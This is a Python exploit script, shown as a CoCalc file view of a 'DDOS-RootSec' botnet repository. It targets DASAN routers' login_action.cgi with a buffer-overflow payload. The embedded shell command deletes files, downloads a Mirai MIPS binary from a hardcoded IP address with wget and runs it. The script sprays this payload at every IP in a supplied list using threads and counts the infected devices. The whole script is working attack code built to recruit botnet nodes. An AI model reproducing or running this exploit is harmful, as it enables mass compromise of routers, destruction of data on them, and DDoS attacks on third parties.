Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/Botnets/Exploits/DASAN/dasan.py
5038 views
1
#!/usr/bin/python

2


3
#zonehax is big 0 day exploiter 10/10

4
import sys, socket, json, time, ssl, struct, os

5
from threading import Thread

6
if len(sys.argv) < 2:

7
	print "Usage: python "+sys.argv[0]+" <list>"

8
	sys.exit()

9
port = 8080

10
buf = 4096

11
pre_pl0 = 0x2ad0c000

12
pre_pl2 = pre_pl0 + 0x00115d40

13
pl2 = struct.pack(">i",pre_pl2)

14
pre_pl3 = pre_pl0 + 0x0003CC9C

15
pl3 =  struct.pack(">i",pre_pl3)

16


17
payload = "rm -rf *; wget http://23.130.192.132/33bi/mirai.mips; chmod 777 mirai.mips; ./mirai.mips exploit.dasan"

18
payload2 = "rm -rf *; wget http://23.130.192.132/33bi/mirai.mips; chmod 777 mirai.mips; ./mirai.mips exploit.dasan"

19
payload3 = "rm -rf *; wget http://23.130.192.132/33bi/mirai.mips; chmod 777 mirai.mips; ./mirai.mips exploit.dasan"

20
payload4 = "rm -rf *; wget http://23.130.192.132/33bi/mirai.mips; chmod 777 mirai.mips; ./mirai.mips exploit.dasan"

21
pre_data = "A"*(756 - 0x28) + pl3 + 'C'*(0x28-8) + pl2 + ';'*24 + payload

22
pre_data2 = "A"*(756 - 0x28) + pl3 + 'C'*(0x28-8) + pl2 + ';'*24 + payload2

23
pre_data3 = "A"*(756 - 0x28) + pl3 + 'C'*(0x28-8) + pl2 + ';'*24 + payload3

24
pre_data4 = "A"*(756 - 0x28) + pl3 + 'C'*(0x28-8) + pl2 + ';'*24 + payload4

25
post_data = "action="+pre_data+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"

26
post_data2 = "action="+pre_data2+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"

27
post_data3 = "action="+pre_data3+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"

28
post_data4 = "action="+pre_data4+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"

29
headers = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data))+"\r\n\r\n"+str(post_data)

30
headers2 = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data2))+"\r\n\r\n"+str(post_data2)

31
headers3 = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data3))+"\r\n\r\n"+str(post_data3)

32
headers4 = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data4))+"\r\n\r\n"+str(post_data4)

33
i = 0

34
ips = open(sys.argv[1]).readlines()

35


36
def dasan(host):

37
    global i

38
    host = host.strip("\n")

39
    try:

40
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

41
        s = ssl.wrap_socket(sock)

42
        s.connect((host, port))

43
        s.send(headers)

44
        s.send(headers2)

45
        s.send(headers3)

46
        resp = s.recv(buf).strip()

47
        if "200 OK" in resp:

48
            i += 1

49
        s.close()

50
    except:

51
        pass

52
		

53
def worker():

54
    for ip in ips:

55
        try:

56
            ip = ip.strip("\r\n")

57
            t = Thread(target=dasan, args=(ip,))

58
            t.start()

59
            time.sleep(0.01)

60
        except:

61
            pass

62
    time.sleep(30)

63
    sys.exit("Finished Scanning")

64
workerthrd = Thread(target=worker)

65
workerthrd.start()

66
print headers

67
while True:

68
    try:

69
        sent = i

70
        sys.stdout.write("\r\033[33mPayload Sent To \033[92m[\033[93m"+str(i)+"\033[92m]\033[33m Devices\033[0m")

71
        sys.stdout.flush()

72
        time.sleep(1)

73
    except KeyboardInterrupt:

74
        sys.exit("Exiting On User Input")

75
    except:

76
        pass

77